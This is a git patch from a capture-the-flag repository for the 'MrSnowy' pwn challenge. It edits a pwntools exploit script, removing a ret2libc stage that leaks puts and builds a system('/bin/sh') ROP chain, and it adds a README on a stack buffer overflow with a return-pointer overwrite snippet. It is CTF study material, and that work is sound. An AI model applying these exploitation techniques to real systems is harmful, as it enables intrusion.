From 3365ce2c4ecc22e5de4af812e39e76a8d6ef7114 Mon Sep 17 00:00:00 2001 From: aaron Date: Wed, 8 Dec 2021 01:13:35 +0100 Subject: [PATCH] add exploit script --- pwn/mrsnowy/.gdb_history | 3 + pwn/mrsnowy/kabuttmache.py | 25 +------- pwn/mrsnowy/mr_snowy | Bin 13496 -> 13496 bytes pwn/mrsnowy/{ => mrsnowy.bak}/Pipfile | 0 pwn/mrsnowy/{ => mrsnowy.bak}/Pipfile.lock | 0 pwn/mrsnowy/mrsnowy.bak/README.md | 63 +++++++++++++++++++++ pwn/mrsnowy/{ => mrsnowy.bak}/core | Bin pwn/mrsnowy/mrsnowy.bak/mr_snowy | Bin 0 -> 13496 bytes pwn/mrsnowy/{ => mrsnowy.bak}/pwn.py | 0 pwn/mrsnowy/{ => mrsnowy.bak}/target | 0 10 files changed, 67 insertions(+), 24 deletions(-) create mode 100644 pwn/mrsnowy/.gdb_history rename pwn/mrsnowy/{ => mrsnowy.bak}/Pipfile (100%) rename pwn/mrsnowy/{ => mrsnowy.bak}/Pipfile.lock (100%) create mode 100644 pwn/mrsnowy/mrsnowy.bak/README.md rename pwn/mrsnowy/{ => mrsnowy.bak}/core (100%) create mode 100755 pwn/mrsnowy/mrsnowy.bak/mr_snowy rename pwn/mrsnowy/{ => mrsnowy.bak}/pwn.py (100%) rename pwn/mrsnowy/{ => mrsnowy.bak}/target (100%) diff --git a/pwn/mrsnowy/.gdb_history b/pwn/mrsnowy/.gdb_history new file mode 100644 index 0000000..fd4eab9 --- /dev/null +++ b/pwn/mrsnowy/.gdb_history @@ -0,0 +1,3 @@ +stack +r +quit diff --git a/pwn/mrsnowy/kabuttmache.py b/pwn/mrsnowy/kabuttmache.py index 72ef5fa..c54bbcc 100755 --- a/pwn/mrsnowy/kabuttmache.py +++ b/pwn/mrsnowy/kabuttmache.py @@ -17,7 +17,7 @@ def do_read(): rop = ROP(elf) rop.call(elf.symbols['puts'], [elf.got['puts']]) -rop.call(elf.symbols['investigate']) +rop.call(elf.symbols['deactivate_camera']) # assemble payload payload = [ @@ -32,28 +32,5 @@ do_read() # send payload p.sendline(b''.join(payload)) -puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00')) -log.info(f'puts found at {hex(puts)}') -# Note: -# libc database search for puts address: 0x6d31333b315b1b20 -# -> libc6_2.19-18+deb8u10_i386 -# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so - -libc = ELF("libc6_2.19-18+deb8u10_i386.so") -libc.address = puts - libc.symbols["puts"] -log.info(f'libc base address determined {hex(libc.address)}') - -rop = ROP(libc) -rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ]) -rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ]) -rop.call('exit') - -# assemble payload -payload = [ - b'\xAA'*offset, - rop.chain() -] - -p.sendline(b''.join(payload)) p.interactive() diff --git a/pwn/mrsnowy/mr_snowy b/pwn/mrsnowy/mr_snowy index e57bee2e9a31cece0b18a634f93fbda65183adff..c5f91ca75693d84c948ea5efa1e1347940bae15b 100755 GIT binary patch delta 18 Xcmdmyxg&FfyC~}f5ZLS^nj;SYP<02x delta 18 acmdmyxg&FfyC~}moxlJ8Z}t(*kp}=-YzYDY diff --git a/pwn/mrsnowy/Pipfile b/pwn/mrsnowy/mrsnowy.bak/Pipfile similarity index 100% rename from pwn/mrsnowy/Pipfile rename to pwn/mrsnowy/mrsnowy.bak/Pipfile diff --git a/pwn/mrsnowy/Pipfile.lock b/pwn/mrsnowy/mrsnowy.bak/Pipfile.lock similarity index 100% rename from pwn/mrsnowy/Pipfile.lock rename to pwn/mrsnowy/mrsnowy.bak/Pipfile.lock diff --git a/pwn/mrsnowy/mrsnowy.bak/README.md b/pwn/mrsnowy/mrsnowy.bak/README.md new file mode 100644 index 0000000..ae9c3d2 --- /dev/null +++ b/pwn/mrsnowy/mrsnowy.bak/README.md @@ -0,0 +1,63 @@ +# MrSnowy + +There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. +But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. +Something must be wrong with him. + +## Flag + +Not pwned + +## Progress so far + +![vulnerable function](images/investigate.png) + +- The `read()` reads 0x108 bytes of input from stdin + - The buffer is uninitialized + - The functioncall sits at `*investigate+67` +- The Stackframe of the function only has a size of 0x40 bytes +- `checksec --file=mrsnowy` reports NX being enabled + - So no shellcode will be placable unless there is executable space + - This hints to ROP Chaining + + +![dissasembly of investigate function](images/investigate_disass.png) + +- The binary should be patched to get rid of the timetaking animation + - Just `nop` the banner() function call using radare2 +- Overwriting the returnpointer of `investigate()` using pwntools: + +```python +context(arch='x86_64', os='linux') +context.terminal = ['/usr/bin/alacritty', '-e'] +e = ELF("mr_snowy") +p = process(e.path) + +# read banner and stuff until input is requested +def do_read(): + while True: + ll = p.read() + print(ll) + if b'>' in ll: + break + +# if not patched wait for the animation and send 1 +do_read() +p.sendline('1') +do_read() + +# write 0x48 bytes and overwrite the return pointer to the top of the stackframe +p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000)) + +# start the python debugger to get a coredump which is loadable by gdb +ipdb.set_trace() +``` + +- Trying to find ROP Gadgets using pwntools + +```python +e = ELF("mr_snowy") +rop = ROP(elf) +rop.rbx +rop.gadgets +``` diff --git a/pwn/mrsnowy/core b/pwn/mrsnowy/mrsnowy.bak/core similarity index 100% rename from pwn/mrsnowy/core rename to pwn/mrsnowy/mrsnowy.bak/core diff --git a/pwn/mrsnowy/mrsnowy.bak/mr_snowy b/pwn/mrsnowy/mrsnowy.bak/mr_snowy new file mode 100755 index 0000000000000000000000000000000000000000..e57bee2e9a31cece0b18a634f93fbda65183adff GIT binary patch literal 13496 zcmcgz4|G)3nZGkbAVl(qe}aJWP|<`x!yg5Mh)x2*hYcE$Si2A>lbM%fWHOU8^M*gJ z*3=N|I0orfT#j8=+HQL|-S!;RQ=zm<5KG)syQV!<*RH{1K@F<{b=B)kGwP{}QB7Q_uq^f6@Jg*dX9S&3DP ziNYu5h}mL1ka4(tTtd{!DSAPgRVZXah9onyhM!%E6SqD2z3h);5o zUM^Whg~kBsk+0PfufDvQaYbj6LrB$<3aLl#k)AH~bg8H42pL9FRJD)VM%QN9zRhkQ zIO2Uo#5%s`D9KW4c-IV3zF`)#pgzthy4!+h=#iiQ(^Me^H_7@6^~-D0e??_; z#ga(4W##otBB8~Ra5TAd@y_a%i&tLnO~ky*x!q)+WN*E_k!zxEm8Q6S8hFB}{LN`M z`LCSz!k1fDgx^{HyOpi|=fB@dvNLdz4Xa(6=yFvsHWOIY<&V#4YYeDn0C6S?*C|ej zxvL7`TMFQM0ep1vxSOGj-0H+uj%T9X%d^7OLh@J+m895<}`7Xo?P{Nz@aDn&^QaG;^t*wz{ zqFop}!=^~Y1JRIZjddDP(U~+8!VGs9lnb^8;v!*&!ocILne_%<~B2> zxv2V%fD1N!5=&S&)z7q6Q!J~b`k8PVLzNn&oe2QQ50&n*;mTJkYqsGYB@Ehb!`0eI z#ho_X{`}Z!!|m&5mklSMRC?5gql2<(uMIEBqC)Jq;WW2YI$*;~6$pCJhL_p!LpHqJ zh99xvYV4@E&xTL7$-id9?ek~AhEKK0pSIz&W~(%4!>20{G-Jarwc&dAnPNR%)H6d9 zdQYF}9v#rTUoAc%MpqoYR1>4~e}Q}XTpx18(<~N4gQH0EpC_I|VrYQ*9}!QXFx1EV z_lTzu7&^rK)5O!z4;^6suZX81AKJ_OW5m-?4|OsBF!40RL!HduPdtVAP&4y!;%TUd z8koP2cpBm%AM-85)6fnrW&SUSr>QWcF~5m;8seb}=5HgOhIU9WUrRg<>CniR0OsFF zJPqa0AoI(Kry(2~V15DdG;~9K%wI`74cX8k@XJ2fkowKNdg>j$``qj7~o{T@#;_&s`_P$0u67<#TsKU2y+59-*15ui<;@U310}Dxo1OZ8}Ea z=pgGgooHqHGGUGSH$IdK`tdJ4dTK;Jp1DPLoz#Exr8zxo;gXyMq4c}f{2soDng9>xVOBj@j!W1)1mSzqp!TGW1ze$ zIaprx;7ET@JtV0w`gbJUUAkEqCSBg`d8J+?W%S1!5p4vy*v`F==BXj8M0zO}!6CU20bGSxI&dW)j$MZn8Zg_c4a*mWd{|D}eN&Q7D zCSz$ry~C3*O^Q&Q*@7~?`z4x>qI~x%t80kUdslqSX8SXTE&Xz94)C+-nB}|_JS7G9 zI0X5j^^`;KIVor;k2r(@is4T9EzRwfQnxsy;H?XpKs}iO{hoN)$ajoY2#~ymqDcQ4m;b2d@$yn6?Dh z!}#!R>7suw|KkQPCxch&>3x<#D_+^w33Qfa>$CG}p1y^K^%p%1o0Qay?LMRFsRuK9 zf87Owhp`GZX7qI31+2)ty!9dSlQ81MZ}KKfj?vI(!f^Ij#kI&igq+@8cL7UCU4|x1 zl+;$$U5NiZjjzbu3;|j1U3dek)Ki0c>O_Ct8G2}>>(1ywyav6GWv6iv*$t_InxBy# z!KpXdgueeMEd(s(8u%IIkFv=5v--Ba3cc!8vf15-@U1(Ikb4!;h0yE+$#ju7sXA2g z;DAUj!0Xq&Wf}yJAH4-8UZ%!C^m`=Q1JPqY$M9sfam!&V-8himcqa9a)UNl=!BX#< z!z6ki<KSlIz&zinmFyrR8Ub`aTKE1R);It1&eWHCtQH057O4IIBP_ju+C*DKxcc&fnS zsh3{&%RW?ffrlI7fBPx7<w867X|0is1Cgwz@7}k!_n|S71HkBl+xLM_T zQhCx+xtvsfhbOD0axbZ*i>{Tfl(U63)cQ=26w*bLWYH&<{w<`hTSaFtv0D94VC}8$ zU9*IwVyFcMekG+|U;}6-z1nA+xly9j%;U(TndS;Ka}8NoOcr{lKSTY}yP}@S8UrQP zLa>$QDaZ6*Lo@RTy&=lLOBaPuEzdQs?`71<5wM2pOBbyiyL2u}k3B?v`Gb#P%zE9- z{D`K_B6M@+GUT{!dU@SVHbu=>Ywq5VdaI_fW^;Y-{F4(jye#)FCVE#*>WdAjbM;m4 z^0(3PFFcvI{u8zLd|+zJ{zd86r#`Dsom-dssAhE9+j{p2m%i#>lkd~F)0U>1tu;+G z_tyAN?9II&e|!QBp>Hkzx}tAs>#KS8mZcryx@EYQN!<@fgZPdpHz=*^m)2OjMGqJ)vq(he{ zY?zw9Wnq)18*xJmCp5F&&=N*4ZkSqUAd%P+i-$BbriBdH2yYLV21^739Y#EGqh^^v z&yl~X*QiICM{hDkk8QXdNj%y2B)bfY%%?4BO&t^oS&+Jx2?h@HL$QlO-Cc+_WWD*FvjzDx?Ny##=wk|hn?>v3rqa#n0Eca@) z*mv8eg-z5t^6ZlbOK#S9aB!pQzlKUeF%Bq-Umk502=huP;x>j82@Iju8VE;>&^-7} zdYju3JROD^h`=|aBcUauEmTpUC1NaMD@FvZ;X(?i_P};S!yX~Er4w^WgT=6k2pF@9 zF+liRvSop+ShiY=#A4e}M>0X7gbvt{?LmVYyNB9ekI+WzTMTr-JKx!DZ$Hd!FcFUT zB@^UWFo|$irUN`Kfk=ybe6JPKNg1^maLSK|TuI_NCC z{ha~*F6bmIYafCx07D(D4j4zAPi zZ6OIDjV){Kg_7*skdrmX5y*j>z(zpm(4=LdI3Or_D_gRPTOV-#I%v`n<$*Lji7u9*IzGo`qTh*TW!&ep<#V9hfblrzC_kGm zzX|2nV4S|`D1SIxz7^%YDBtKP*STB+_5jL{qMU#3Qa(0vF=_DcWCtK~1TqEzwPh7g zxNFO1?(x)>X}#lW%PJo)(#w`UGF~sM?w+u*%oi`Kt|?nuQ&w49ra=z!wPnS;ubqLN zLD*4aN#_3Cbg0C~s$G)8G$%zTNxr?<$GK9;pThndrOWtEzehH6ZnoqpHYjm_fcj)P zjTI$T{^^&aG2-{TeMGXqiOwvtczjxM>T~;;^1}wX!^{bx_M&G>-oA%R5QQA2>bcEK zRi6#Y2C6wjAC;75SVTNJ-p4tGS4v*_-7Mwk1Co-e{|bxEwhvR8+o$>yFK^5jOM7_J za+G5!VSYfiUz+rY@EA8cA15x?a+| zC2f^-yQGgu`jn(Ul=MYOPfD8a@1Np7knws}(oZG*gQQblhO|JJo@Z`3LqTar;T zsomgR;a$4;x+HVUzP_y5yY%`h3;k2|Qn?3juhniJWgW?bciPQvp93StgMX&mM_EVm zh;i9@VlVJu*7Ui3c8K#H{Nk+Uk-g9(CWx`(%Y&#@ap{zwC{+AA@sjL3apITYmj|C6 z;=D&p5?y2BrP*^Db|sG}6Kb7t;^kscj+Ya!$euHB;*-VcSw1_&c@KVhRqK|$&?Ba1 z*DEJJ4d*AC?GWcZVtRIcu@`y-zE`!e#|#viVC@I zt8)55hHzgVK2PFZdH4;$U0C(nrJrh@TF>~!{Xm}uWM4fuz;fD!yK9X8+z)&#{|mM2 z`)p^j_<)ZO=1-J`uMET?OD=D8p?*GR4#qo2N?OZ&*6VQMu=m+{$ zijsP+%wU`$$88btF@Lv*qBcgH_zKwBB<-l*pVjlo0A2w*^z)THMGDxN%=pFgtE+(g zlLhdD1@NCUUMh^qK6Z!S-H`jW#CJ}yaDHC{eyV_-_X^-e=(j0s*?F5;0AI*>sdz)i zKfkL&^*Z3xZ~61oSHKRPgQ9W&pu)!$@08Uy0oP>SPN<&A?n^~+-ni@{9A6h|9UCW= z9%cJ>3s(MV#!JQOQXd2SE{)s)iJMa`oZoMO|5)P9GCuj86ZkI**nbISbSkMc&(8sA z=dkQIwL-l~xEpVS5(mp^m6TWK?iNb?Ly6xv&Bw?$C4LS#)teu;ZjaT^^gAyl^&UBa zafTeXIlw1l95v}becMpFrhxn^mY*RaQeO4{Ed}K7EPw|K;5&fRxaYU)u>$fha{pZX z+#Jui)fW4`o9&c}v$8+=y95HM0`^5PZYIoRYpXYi4Xe1(hCL-C?l(L9IK>k+5;%Yp ziuv0jv6eu@AHrT!!XHTP6v0>rHl?t;<-K9$s_L&igPRu%B<;3_jl@rSCv}H zI%DN5=2Krzh);JpA+;Ndh(K$sBU$ngms61aN5jyoj>B6}OvL={IAInsgnz>wFoE-A z{$v81q;$^AX@xgiMQ+~=D!D3xJ&R&=xMaH#ryW2C<3|~KFF*=1*BLQ|mpk2S8rZV-(%eQ_j04+iw9DDt9)hmo zEDdW~TN)}4!-0-)5Vgi&%d&wH5nik-9at;uE83rzr~L-JB4ppcs@*RJo`PS&O2);vnTbOP}nkL?E31v&6EbOR)Uh|>#qZjZL657f4|$u zl4}32lDXWzNU`Jg@W{yOtM5hn&5hDw zi)8O)!=CO1Lwgvie)U~BAoZ6^VaaCeQS#eRPJ1GXSKpt-a^pvn`uYA#Slo{c^{LWV z->H>SzgY^Z`t#erTk6+JxktzQIQOX3ACwIyecD^f*WUw-M5K83yO&Si0iS`(p2$~w zN`bNKtMB73SrPBe+7xKtmy)7SB5&7M?_C3OW6G^I@K`ISCt2}yp1%6tJ|#EO)c%%| z&-ed;)K~pKDBsrxrG96gg6cnI?_i$3`uhO&cLTeXprm=`#EW_Q>O23md||9qj!FIe z`ul*>H#5xvO6t2%{T)HRyy6vo9XjQ>l)l>M^wEKGBqe8YIbPwXQ9!Yy^wsyO`a2Ev z_ZTX^l%5*@-$R$iU+JrT&g!`UkzTV%_OA35eGese{p@#;W~nq}HLZ+CGnXOlr&%ezX4^WFERiC literal 0 HcmV?d00001 diff --git a/pwn/mrsnowy/pwn.py b/pwn/mrsnowy/mrsnowy.bak/pwn.py similarity index 100% rename from pwn/mrsnowy/pwn.py rename to pwn/mrsnowy/mrsnowy.bak/pwn.py diff --git a/pwn/mrsnowy/target b/pwn/mrsnowy/mrsnowy.bak/target similarity index 100% rename from pwn/mrsnowy/target rename to pwn/mrsnowy/mrsnowy.bak/target